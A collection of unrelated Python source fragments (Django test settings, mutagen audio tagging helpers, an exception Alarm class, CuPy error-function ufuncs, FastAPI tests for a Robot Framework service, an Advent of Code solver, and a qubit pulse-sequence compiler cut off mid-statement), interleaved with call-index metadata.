'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
] + get_core_apps()
INTERNAL_APPS = [
'asiapay',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
COVERAGE_MODULE_EXCLUDES += EXTERNAL_APPS
SECRET_KEY = 'foobar'
|
[
"os.path.dirname",
"oscar.get_core_apps",
"logging.getLogger"
] |
[((774, 799), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (789, 799), False, 'import os\n'), ((844, 869), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (859, 869), False, 'import os\n'), ((2049, 2074), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (2064, 2074), False, 'import os\n'), ((2528, 2543), 'oscar.get_core_apps', 'get_core_apps', ([], {}), '()\n', (2541, 2543), False, 'from oscar import get_core_apps\n'), ((228, 256), 'logging.getLogger', 'logging.getLogger', (['"""factory"""'], {}), "('factory')\n", (245, 256), False, 'import logging\n'), ((926, 951), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (941, 951), False, 'import os\n'), ((1079, 1104), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1094, 1104), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Muges
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
The :mod:`erika.tags` module provides functions to set and get tags for various
audio format.
For now, the only supported format is MP3.
"""
import logging
import mutagen
from . import mp3
def set_tags(filename, episode):
"""Set the tags of the audio file of an episode.
Parameters
----------
filename : str
The audio file.
episode : :class:`Episode`
The corresponding episode.
"""
logger = logging.getLogger(__name__)
try:
audio = mutagen.File(filename)
except Exception: # pylint: disable=broad-except
logger.exception("Unable to set tags for '%s'.", filename)
return None
if isinstance(audio, mutagen.mp3.MP3):
mp3.set_tags(audio, episode)
else:
logger.warning("Unable to set tags (unsupported file format) for "
"'%s'.", filename)
def get_tags(filename):
"""Get the tags of an audio file.
Parameters
----------
filename : str
The audio file.
"""
logger = logging.getLogger(__name__)
try:
audio = mutagen.File(filename)
except Exception: # pylint: disable=broad-except
logger.exception("Unable to get tags for '%s'.", filename)
return None
if isinstance(audio, mutagen.mp3.MP3):
return mp3.get_tags(audio)
else:
logger.warning("Unable to get tags (unsupported file format) for "
"'%s'.", filename)
return None
|
[
"mutagen.File",
"logging.getLogger"
] |
[((1560, 1587), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1577, 1587), False, 'import logging\n'), ((2145, 2172), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2162, 2172), False, 'import logging\n'), ((1614, 1636), 'mutagen.File', 'mutagen.File', (['filename'], {}), '(filename)\n', (1626, 1636), False, 'import mutagen\n'), ((2199, 2221), 'mutagen.File', 'mutagen.File', (['filename'], {}), '(filename)\n', (2211, 2221), False, 'import mutagen\n')]
|
import traceback
import uuid
from types import TracebackType
from typing import List, Type
class Alarm:
""" Stores all information about a thrown exception. """
def __init__(
self,
exc_type: Type[BaseException],
exc: BaseException,
exc_traceback: TracebackType
) -> None:
"""
Create new Alarm
Args:
exc_type (:obj:`Type[BaseException]`): type of exception, that was thrown.
exc (:obj:`BaseException`): exception instance, that was thrown.
exc_traceback(:obj:`TracebackType`): traceback, that led to the exception.
"""
# store information about the exception
self.exc_type = exc_type
self.exc = exc
self.exc_traceback = exc_traceback
# generate unique error code for alert
self.error_code = str(uuid.uuid1())[0:8]
def get_exc_name(self) -> str:
""" returns the exceptions class name """
return (
self.exc['error_class']
if isinstance(self.exc, dict)
else self.exc.__class__.__name__
)
def get_exc_message(self) -> str:
""" returns the exceptions message """
return (
self.exc['error_message']
if isinstance(self.exc, dict)
else str(self.exc)
)
def get_formatted_traceback_string(self) -> str:
""" returns a formatted string version of the exceptions traceback """
# format traceback to string -> ftb
ftb = ''.join(traceback.format_tb(self.exc_traceback))
# return printable traceback
return (
'Traceback (most recent call last):\n'
f'{ftb}'
f'{self.get_exc_name()}: {self.get_exc_message()}'
)
def get_traceback_list(self) -> List[str]:
"""returns traceback in form of a list of strings."""
return traceback.format_tb(self.exc_traceback)
|
[
"uuid.uuid1",
"traceback.format_tb"
] |
[((1906, 1945), 'traceback.format_tb', 'traceback.format_tb', (['self.exc_traceback'], {}), '(self.exc_traceback)\n', (1925, 1945), False, 'import traceback\n'), ((1539, 1578), 'traceback.format_tb', 'traceback.format_tb', (['self.exc_traceback'], {}), '(self.exc_traceback)\n', (1558, 1578), False, 'import traceback\n'), ((860, 872), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (870, 872), False, 'import uuid\n')]
|
from cupy import _core
erf = _core.create_ufunc(
'cupyx_scipy_erf', ('f->f', 'd->d'),
'out0 = erf(in0)',
doc='''Error function.
.. seealso:: :meth:`scipy.special.erf`
''')
erfc = _core.create_ufunc(
'cupyx_scipy_erfc', ('f->f', 'd->d'),
'out0 = erfc(in0)',
doc='''Complementary error function.
.. seealso:: :meth:`scipy.special.erfc`
''')
erfcx = _core.create_ufunc(
'cupyx_scipy_erfcx', ('f->f', 'd->d'),
'out0 = erfcx(in0)',
doc='''Scaled complementary error function.
.. seealso:: :meth:`scipy.special.erfcx`
''')
erfinv = _core.create_ufunc(
'cupyx_scipy_erfinv', ('f->f', 'd->d'),
'out0 = erfinv(in0);',
doc='''Inverse function of error function.
.. seealso:: :meth:`scipy.special.erfinv`
.. note::
The behavior close to (and outside) the domain follows that of
SciPy v1.4.0+.
''')
erfcinv = _core.create_ufunc(
'cupyx_scipy_erfcinv', ('f->f', 'd->d'),
'out0 = erfcinv(in0);',
doc='''Inverse function of complementary error function.
.. seealso:: :meth:`scipy.special.erfcinv`
.. note::
The behavior close to (and outside) the domain follows that of
SciPy v1.4.0+.
''')
|
[
"cupy._core.create_ufunc"
] |
[((31, 191), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erf"""', "('f->f', 'd->d')", '"""out0 = erf(in0)"""'], {'doc': '"""Error function.\n\n .. seealso:: :meth:`scipy.special.erf`\n\n """'}), '(\'cupyx_scipy_erf\', (\'f->f\', \'d->d\'), \'out0 = erf(in0)\',\n doc="""Error function.\n\n .. seealso:: :meth:`scipy.special.erf`\n\n """\n )\n', (49, 191), False, 'from cupy import _core\n'), ((205, 387), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfc"""', "('f->f', 'd->d')", '"""out0 = erfc(in0)"""'], {'doc': '"""Complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfc`\n\n """'}), '(\'cupyx_scipy_erfc\', (\'f->f\', \'d->d\'), \'out0 = erfc(in0)\',\n doc=\n """Complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfc`\n\n """\n )\n', (223, 387), False, 'from cupy import _core\n'), ((397, 589), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfcx"""', "('f->f', 'd->d')", '"""out0 = erfcx(in0)"""'], {'doc': '"""Scaled complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcx`\n\n """'}), '(\'cupyx_scipy_erfcx\', (\'f->f\', \'d->d\'),\n \'out0 = erfcx(in0)\', doc=\n """Scaled complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcx`\n\n """\n )\n', (415, 589), False, 'from cupy import _core\n'), ((600, 904), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfinv"""', "('f->f', 'd->d')", '"""out0 = erfinv(in0);"""'], {'doc': '"""Inverse function of error function.\n\n .. seealso:: :meth:`scipy.special.erfinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """'}), '(\'cupyx_scipy_erfinv\', (\'f->f\', \'d->d\'),\n \'out0 = erfinv(in0);\', doc=\n """Inverse function of error function.\n\n .. seealso:: :meth:`scipy.special.erfinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """\n )\n', (618, 904), False, 'from cupy import _core\n'), ((916, 1237), 'cupy._core.create_ufunc', '_core.create_ufunc', (['"""cupyx_scipy_erfcinv"""', "('f->f', 'd->d')", '"""out0 = erfcinv(in0);"""'], {'doc': '"""Inverse function of complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """'}), '(\'cupyx_scipy_erfcinv\', (\'f->f\', \'d->d\'),\n \'out0 = erfcinv(in0);\', doc=\n """Inverse function of complementary error function.\n\n .. seealso:: :meth:`scipy.special.erfcinv`\n\n .. note::\n The behavior close to (and outside) the domain follows that of\n SciPy v1.4.0+.\n\n """\n )\n', (934, 1237), False, 'from cupy import _core\n')]
|
from fastapi.testclient import TestClient
import unittest
from RobotFrameworkService.main import app
class EndpointTesttest_s(unittest.TestCase):
def test_is_service_available(self):
with TestClient(app) as client:
response = client.get("/status")
self.assertEqual(200, response.status_code)
def test_is_robottask_startable(self):
with TestClient(app) as client:
response = client.get("/robotframework/run/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_logs_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show/anotherTask?art=tests&description=EreichbarkeitsTestMitLogs")
self.assertEqual(200, response.status_code)
def test_is_robottask_available_with_reports_and_arguments(self):
with TestClient(app) as client:
response = client.get("/robotframework/run_and_show_report/anotherTask?art=tests&description=FunktionsTestMitReports")
self.assertEqual(200, response.status_code)
def test_is_robotlog_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_log/anotherTask")
self.assertEqual(200, response.status_code)
def test_is_robotreport_available(self):
with TestClient(app) as client:
client.get("/robotframework/run/anotherTask")
response = client.get("/robotframework/show_report/anotherTask")
self.assertEqual(200, response.status_code)
|
[
"fastapi.testclient.TestClient"
] |
[((203, 218), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (213, 218), False, 'from fastapi.testclient import TestClient\n'), ((384, 399), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (394, 399), False, 'from fastapi.testclient import TestClient\n'), ((599, 614), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (609, 614), False, 'from fastapi.testclient import TestClient\n'), ((826, 841), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (836, 841), False, 'from fastapi.testclient import TestClient\n'), ((1071, 1086), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1081, 1086), False, 'from fastapi.testclient import TestClient\n'), ((1360, 1375), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1370, 1375), False, 'from fastapi.testclient import TestClient\n'), ((1626, 1641), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1636, 1641), False, 'from fastapi.testclient import TestClient\n'), ((1896, 1911), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1906, 1911), False, 'from fastapi.testclient import TestClient\n')]
|
from aoc import data
import sys
from math import ceil
earliest, idString = data()
earliest = int(earliest)
ids = [x if x == 'x' else int(x) for x in idString.split(',')]
def part1(earliest, ids):
ids = [x for x in ids if x != 'x']
soonest = {ceil(earliest / id) * id:id for id in ids}
bus = soonest[min(soonest)]
wait = min(soonest) - earliest
return bus * wait
def part2(ids):
positions = [(k, int(v)) for k, v in enumerate(ids) if v != 'x']
lcm, time = 1, 0
for pos, bus in positions:
[time] = [x * lcm + time for x in range(bus) if (x * lcm + time + pos) % bus == 0]
lcm *= bus
return(time)
print(part1(earliest, ids))
print(part2(ids))
|
[
"aoc.data",
"math.ceil"
] |
[((76, 82), 'aoc.data', 'data', ([], {}), '()\n', (80, 82), False, 'from aoc import data\n'), ((252, 271), 'math.ceil', 'ceil', (['(earliest / id)'], {}), '(earliest / id)\n', (256, 271), False, 'from math import ceil\n')]
|
#!/usr/bin/env python3
import logging
import numpy as np
import copy
import crosstalk
import gates
import predistortion
import pulses
import qubits
import readout
import tomography
# Allow logging to Labber's instrument log
log = logging.getLogger('LabberDriver')
# TODO Reduce calc of CZ by finding all unique TwoQubitGates in seq and calc.
# TODO Make I(width=None) have the width of the longest gate in the step
# TODO Add checks so that not both t0 and dt are given
# TODO Two composite gates should be able to be parallell
# TODO check number of qubits in seq and in gate added to seq
# TODO Remove pulse from I gates
class GateOnQubit:
def __init__(self, gate, qubit, pulse=None):
self.gate = gate
self.qubit = qubit
self.pulse = pulse
if pulse is None:
self.duration = 0
else:
self.duration = pulse.total_duration()
def __str__(self):
return "Gate {} on qubit {}".format(self.gate, self.qubit)
def __repr__(self):
return self.__str__()
class Step:
"""Represent one step in a sequence.
Parameters
----------
n_qubit : int
Number of qubits in the sequece.
t0 : float
Center of the sequence in seconds (the default is None).
dt : float
Spacing to previous pulse in seconds (the default is None). Use only
either t0 or dt.
align : str {'left', 'center', 'right'}
The alignment of pulses if they have different lengths,
(the default is 'center').
Attributes
----------
gates : list of :dict:
The different gates in the step.
"""
def __init__(self, t0=None, dt=None, align='center'):
self.gates = []
self.align = align
self.t0 = t0
self.dt = dt
self.t_start = None
self.t_end = None
def add_gate(self, qubit, gate):
"""Add the given gate to the specified qubit(s).
The number of gates must equal the number of qubits.
If the number of qubits given are less than the number of qubits in the
step, I gates are added to the other qubits.
Parameters
----------
qubit : int or list of int
The qubit indices.
gate : :obj:`BaseGate`
The gate(s).
"""
if gate.number_of_qubits() > 1 and not isinstance(qubit, list):
raise ValueError(
"Provide a list of qubits for gates with more than one qubit")
if gate.number_of_qubits() > 1 and not gate.number_of_qubits() == len(
qubit):
raise ValueError(
"""Number of qubits in the gate must equal the number of qubit
indices given""")
if gate.number_of_qubits() == 1 and not isinstance(qubit, int):
raise ValueError("Provide qubit as int for gates with one qubit")
if isinstance(qubit, int):
if self._qubit_in_step(qubit):
raise ValueError("Qubit {} already in step.".format(qubit))
else:
for n in qubit:
if self._qubit_in_step(n):
raise ValueError("Qubit {} already in step.".format(n))
self.gates.append(GateOnQubit(gate, qubit))
def time_shift(self, shift):
"""Shift the timings of the step.
Parameters
----------
shift : float
The amount of shift to apply in seconds.
"""
self.t_start += shift
self.t0 += shift
self.t_end += shift
def _qubit_in_step(self, qubit):
"""Returns whatever the given qubit is in the step or not. """
if not isinstance(qubit, int):
raise ValueError("Qubit index should be int.")
def _in(input_list, n):
flat_list = []
for sublist_or_el in input_list:
if isinstance(sublist_or_el, list):
if _in(sublist_or_el, n) is True:
return True
elif sublist_or_el == n:
return True
return False
return _in([x.qubit for x in self.gates], qubit)
def __str__(self):
return str(self.gates)
def __repr__(self):
return str(self.gates)
class Sequence:
"""A multi qubit seqence.
Parameters
----------
n_qubit : type
The number of qubits in the sequence.
Attributes
----------
sequences : list of :obj:`Step`
Holds the steps of the sequence.
perform_process_tomography : bool
Flag for performing process tomography.
perform_state_tomography : bool
Flag for performing state tomography.
readout_delay : float
Delay time between last pulse and readout, in seconds.
n_qubit
"""
def __init__(self, n_qubit):
self.n_qubit = n_qubit
# log.info('initiating empty seqence list')
self.sequence_list = []
# process tomography
self.perform_process_tomography = False
self._process_tomography = tomography.ProcessTomography()
# state tomography
self.perform_state_tomography = False
self._state_tomography = tomography.StateTomography()
# readout
self.readout_delay = 0.0
# Public methods
def generate_sequence(self, config):
"""Generate sequence by adding gates/pulses to waveforms.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window.
"""
raise NotImplementedError()
def get_sequence(self, config):
"""Compile sequence and return it.
Parameters
----------
config : dict
Labber instrument configuration.
Returns
-------
list of :obj:`Step`
The compiled qubit sequence.
"""
self.sequence_list = []
if self.perform_process_tomography:
self._process_tomography.add_pulses(self)
self.generate_sequence(config)
if self.perform_state_tomography:
self._state_tomography.add_pulses(self)
if self.readout_delay > 0:
delay = gates.IdentityGate(width=self.readout_delay)
self.add_gate_to_all(delay, dt=0)
self.add_gate_to_all(gates.ReadoutGate(), dt=0, align='left')
return self
# Public methods for adding pulses and gates to the sequence.
def add_single_pulse(self,
qubit,
pulse,
t0=None,
dt=None,
align_left=False):
"""Add single qubit pulse to specified qubit.
This function still exist to not break existing
funcationallity. You should really use the add_gate method.
t0 or dt can be used to override the global pulse spacing.
Parameters
----------
qubit : int
Qubit number, indexed from 0.
pulse : :obj:`Pulse`
Definition of pulse to add.
t0 : float, optional
Absolute pulse position.
dt : float, optional
Pulse spacing, referenced to the previous pulse.
align_left: bool, optional
If True, aligns the pulse to the left. Defaults to False.
"""
gate = gates.CustomGate(pulse)
if align_left is True:
self.add_gate(qubit, gate, t0, dt, 'left')
else:
self.add_gate(qubit, gate, t0, dt, 'center')
def add_single_gate(self, qubit, gate, t0=None, dt=None, align_left=False):
"""Add single gate to specified qubit sequence.
Note, this function still exist is to not break existing
funcationallity. You should really use the add_gate method.
t0 or dt can be used to override the global pulse spacing.
Parameters
----------
qubit : int
Qubit number, indexed from 0.
gate : :obj:`Gate`
Definition of gate to add.
t0 : float, optional
Absolute pulse position.
dt : float, optional
Pulse spacing, referenced to the previous pulse.
align_left : boolean, optional
If True, t0 is the start of the pulse, otherwise it is the center
of the pulse. False is the default.
"""
if align_left is True:
self.add_gate(qubit, gate, t0, dt, 'left')
else:
self.add_gate(qubit, gate, t0, dt, 'center')
def add_gate(self,
qubit,
gate,
t0=None,
dt=None,
align='center',
index=None):
"""Add a set of gates to the given qubit sequences.
For the qubits with no specificied gate, an IdentityGate will be given.
The length of the step is given by the longest pulse.
Parameters
----------
qubit : int or list of int
The qubit(s) to add the gate(s) to.
gate : :obj:`BaseGate` or list of :obj:`BaseGate`
The gate(s) to add.
t0 : float, optional
Absolute gate position (the default is None).
dt : float, optional
Gate spacing, referenced to the previous pulse
(the default is None).
align : str, optional
If two or more qubits have differnt pulse lengths, `align`
specifies how those pulses should be aligned. 'Left' aligns the
start, 'center' aligns the centers, and 'right' aligns the end,
(the default is 'center').
index : int, optional
Where in the sequence to insert the new gate.
"""
step = Step(t0=t0, dt=dt, align=align)
if isinstance(gate, list):
if not isinstance(qubit, list):
raise ValueError(
"""Provide qubit indices as a list when adding more than
one gate.""")
if len(gate) != len(qubit):
raise ValueError(
"Length of gate list must equal length of qubit list.")
for q, g in zip(qubit, gate):
step.add_gate(q, g)
else:
if gate.number_of_qubits() > 1:
if not isinstance(qubit, list):
raise ValueError(
"Provide qubit list for gates with more than one qubit"
)
else:
if not isinstance(qubit, int):
raise ValueError(
"For single gates, give qubit as int (not list).")
step.add_gate(qubit, gate)
# log.info('adding gate {} to {}. 2qb gate: {}'.format(gate, qubit, isinstance(gate, gates.TwoQubitGate)))
if index is None:
self.sequence_list.append(step)
# log.info('adding step to sequence list')
# log.info('sequence len is {}'.format(len(self.sequence_list)))
else:
self.sequence_list.insert(index + 1, step)
# log.info('inserting step in sequence list')
# log.info('sequence len is {}'.format(len(self.sequence_list)))
def add_gate_to_all(self, gate, t0=None, dt=None, align='center'):
"""Add a single gate to all qubits.
Pulses are added at the end of the sequence, with the gate spacing set
by either the spacing parameter or the aboslut position.
"""
if isinstance(gate, list):
raise ValueError("Only single gates allowed.")
if isinstance(gate, (gates.BaseGate, gates.CompositeGate)):
if gate.number_of_qubits() > 1:
raise ValueError(
"Not clear how to add multi-qubit gates to all qubits.")
qubit = list(range((self.n_qubit)))
gate = [gate for n in range(self.n_qubit)]
self.add_gate(qubit, gate, t0=t0, dt=dt, align=align)
def add_gates(self, gates):
"""Add multiple gates to the qubit waveform.
Pulses are added at the end of the sequence, with the gate spacing set
by the spacing parameter.
Examples
--------
Add three gates to a two-qubit sequence, first a positive pi-pulse
around X to qubit 1, then a negative pi/2-pulse to qubit 2, finally
simultaneous positive pi-pulses to qubits 1 and 2.
>>> add_gates([[gates.Xp, None ],
[None, gates.Y2m],
[gates.Xp, gates.Xp]])
Parameters
----------
gates : list of list of :obj:`BaseGate`
List of lists defining gates to add. The innermost list should
have the same length as number of qubits in the sequence.
"""
# make sure we have correct input
if not isinstance(gates, (list, tuple)):
raise Exception('The input must be a list of list with gates')
if len(gates) == 0:
return
if not isinstance(gates[0], (list, tuple)):
raise Exception('The input must be a list of list with gates')
# add gates sequence to waveforms
for gate in gates:
# add gate to specific qubit waveform
qubit = list(range(len(gate)))
self.add_gate(qubit, gate)
def set_parameters(self, config={}):
"""Set base parameters using config from from Labber driver.
Parameters
----------
config : dict
Configuration as defined by Labber driver configuration window
"""
# sequence parameters
d = dict(
Zero=0,
One=1,
Two=2,
Three=3,
Four=4,
Five=5,
Six=6,
Seven=7,
Eight=8,
Nine=9)
# If the number of qubits changed, we need to re-init
if self.n_qubit != d[config.get('Number of qubits')]:
self.__init__(d[config.get('Number of qubits')])
# Readout
self.readout_delay = config.get('Readout delay')
# process tomography prepulses
self.perform_process_tomography = \
config.get('Generate process tomography prepulse', False)
self._process_tomography.set_parameters(config)
# state tomography
self.perform_state_tomography = config.get(
'Generate state tomography postpulse', False)
self._state_tomography.set_parameters(config)
class SequenceToWaveforms:
"""Compile a multi qubit sequence into waveforms.
Parameters
----------
n_qubit : type
The maximum number of qubits.
Attributes
----------
dt : float
Pulse spacing, in seconds.
local_xy : bool
If False, collate all waveforms into one.
simultaneous_pulses : bool
If False, seperate all pulses in time.
sample_rate : float
AWG Sample rate.
n_pts : float
Number of points in the waveforms.
first_delay : float
Delay between start of waveform and start of the first pulse.
trim_to_sequence : bool
If True, adjust `n_points` to just fit the sequence.
align_to_end : bool
Align the whole sequence to the end of the waveforms.
Only relevant if `trim_to_sequence` is False.
sequences : list of :obj:`Step`
The qubit sequences.
qubits : list of :obj:`Qubit`
Parameters of each qubit.
wave_xy_delays : list of float
Indiviudal delays for the XY waveforms.
wave_z_delays : list of float
Indiviudal delays for the Z waveforms.
n_qubit
"""
def __init__(self, n_qubit):
self.n_qubit = n_qubit
self.dt = 10E-9
self.local_xy = True
self.simultaneous_pulses = True
# waveform parameter
self.sample_rate = 1.2E9
self.n_pts = 240E3
self.first_delay = 100E-9
self.trim_to_sequence = True
self.align_to_end = False
self.sequence_list = []
self.qubits = [qubits.Qubit() for n in range(self.n_qubit)]
# waveforms
self._wave_xy = [
np.zeros(0, dtype=np.complex) for n in range(self.n_qubit)
]
# log.info('_wave_z initiated to 0s')
self._wave_z = [np.zeros(0) for n in range(self.n_qubit)]
self._wave_gate = [np.zeros(0) for n in range(self.n_qubit)]
# waveform delays
self.wave_xy_delays = np.zeros(self.n_qubit)
self.wave_z_delays = np.zeros(self.n_qubit)
# define pulses
self.pulses_1qb_xy = [None for n in range(self.n_qubit)]
self.pulses_1qb_z = [None for n in range(self.n_qubit)]
self.pulses_2qb = [None for n in range(self.n_qubit - 1)]
self.pulses_readout = [None for n in range(self.n_qubit)]
# cross-talk
self.compensate_crosstalk = False
self._crosstalk = crosstalk.Crosstalk()
# predistortion
self.perform_predistortion = False
self._predistortions = [
predistortion.Predistortion(n) for n in range(self.n_qubit)
]
self._predistortions_z = [
predistortion.ExponentialPredistortion(n)
for n in range(self.n_qubit)
]
# gate switch waveform
self.generate_gate_switch = False
self.uniform_gate = False
self.gate_delay = 0.0
self.gate_overlap = 20E-9
self.minimal_gate_time = 20E-9
# filters
self.use_gate_filter = False
self.use_z_filter = False
# readout trig settings
self.readout_trig_generate = False
# readout wave object and settings
self.readout = readout.Demodulation(self.n_qubit)
self.readout_trig = np.array([], dtype=float)
self.readout_iq = np.array([], dtype=np.complex)
def get_waveforms(self, sequence):
"""Compile the given sequence into waveforms.
Parameters
----------
sequences : list of :obj:`Step`
The qubit sequence to be compiled.
Returns
-------
type
Description of returned object.
"""
self.sequence = sequence
self.sequence_list = sequence.sequence_list
# log.info('Start of get_waveforms. Len sequence list: {}'.format(len(self.sequence_list)))
# log.info('Point 1: Sequence_list[3].gates = {}'.format(self.sequence_list[3].gates))
if not self.simultaneous_pulses:
self._seperate_gates()
# log.info('Point 2: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._explode_composite_gates()
# log.info('Point 3: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._add_pulses_and_durations()
# log.info('Point 4: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._add_timings()
# log.info('Point 5: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
self._init_waveforms()
# log.info('Point 6: Sequence_list[6].gates = {}'.format(self.sequence_list[6].gates))
if self.align_to_end:
shift = self._round((self.n_pts - 2) / self.sample_rate -
self.sequence_list[-1].t_end)
for step in self.sequence_list:
step.time_shift(shift)
self._perform_virtual_z()
self._generate_waveforms()
# collapse all xy pulses to one waveform if no local XY control
if not self.local_xy:
# sum all waveforms to first one
self._wave_xy[0] = np.sum(self._wave_xy[:self.n_qubit], 0)
# clear other waveforms
for n in range(1, self.n_qubit):
self._wave_xy[n][:] = 0.0
# log.info('before predistortion, _wave_z max is {}'.format(np.max(self._wave_z)))
# if self.compensate_crosstalk:
# self._perform_crosstalk_compensation()
if self.perform_predistortion:
self._predistort_xy_waveforms()
if self.perform_predistortion_z:
self._predistort_z_waveforms()
if self.readout_trig_generate:
self._add_readout_trig()
if self.generate_gate_switch:
self._add_microwave_gate()
self._filter_output_waveforms()
# Apply offsets
self.readout_iq += self.readout_i_offset + 1j * self.readout_q_offset
# create and return dictionary with waveforms
waveforms = dict()
waveforms['xy'] = self._wave_xy
waveforms['z'] = self._wave_z
waveforms['gate'] = self._wave_gate
waveforms['readout_trig'] = self.readout_trig
waveforms['readout_iq'] = self.readout_iq
# log.info('returning z waveforms in get_waveforms. Max is {}'.format(np.max(waveforms['z'])))
return waveforms
def _seperate_gates(self):
new_sequences = []
for step in self.sequence_list:
if any(
isinstance(gate, (gates.ReadoutGate, gates.IdentityGate))
for gate in step.gates):
# Don't seperate I gates or readouts since we do
# multiplexed readout
new_sequences.append(step)
continue
for gate in step.gates:
# log.info('In seperate gates, handling gate {}'.format(gate))
if gate.gate is not None:
new_step = Step(
t0=step.t_start, dt=step.dt, align=step.align)
new_step.add_gate(gate.qubit, gate.gate)
new_sequences.append(new_step)
# log.info('New sequence [6] is {}'.format(new_sequences[6].gates))
self.sequence_list = new_sequences
def _add_timings(self):
t_start = 0
for step in self.sequence_list:
if step.dt is None and step.t0 is None:
# Use global pulse spacing
step.dt = self.dt
# Find longest gate in sequence
max_duration = np.max([x.duration for x in step.gates])
if step.t0 is None:
step.t_start = self._round(t_start + step.dt)
step.t0 = self._round(step.t_start + max_duration / 2)
else:
step.t_start = self._round(step.t0 - max_duration / 2)
step.t_end = self._round(step.t_start + max_duration)
t_start = step.t_end # Next step starts where this one ends
# Avoid double spacing for steps with 0 duration
if max_duration == 0:
t_start = t_start - step.dt
# Make sure that the sequence is sorted chronologically.
# self.sequence_list.sort(key=lambda x: x.t_start) # TODO Fix this
# Make sure that sequnce starts on first delay
time_diff = self._round(self.first_delay -
self.sequence_list[0].t_start)
for step in self.sequence_list:
step.time_shift(time_diff)
def _add_pulses_and_durations(self):
for step in self.sequence_list:
for gate in step.gates:
if gate.pulse is None:
gate.pulse = self._get_pulse_for_gate(gate)
if gate.pulse is None:
gate.duration = 0
else:
gate.duration = gate.pulse.total_duration()
def _get_pulse_for_gate(self, gate):
qubit = gate.qubit
gate = gate.gate
# Virtual Z is special since it has no length
if isinstance(gate, gates.VirtualZGate):
pulse = None
# Get the corresponding pulse for other gates
elif isinstance(gate, gates.SingleQubitXYRotation):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_xy[qubit])
elif isinstance(gate, gates.SingleQubitZRotation):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_z[qubit])
elif isinstance(gate, gates.IdentityGate):
pulse = gate.get_adjusted_pulse(self.pulses_1qb_xy[qubit])
elif isinstance(gate, gates.TwoQubitGate):
pulse = gate.get_adjusted_pulse(self.pulses_2qb[qubit[0]])
elif isinstance(gate, gates.ReadoutGate):
pulse = gate.get_adjusted_pulse(self.pulses_readout[qubit])
elif isinstance(gate, gates.CustomGate):
pulse = gate.get_adjusted_pulse(gate.pulse)
else:
raise ValueError('Please provide a pulse for {}'.format(gate))
return pulse
def _predistort_xy_waveforms(self):
"""Pre-distort the waveforms."""
# go through and predistort all xy waveforms
n_wave = self.n_qubit if self.local_xy else 1
for n in range(n_wave):
self._wave_xy[n] = self._predistortions[n].predistort(
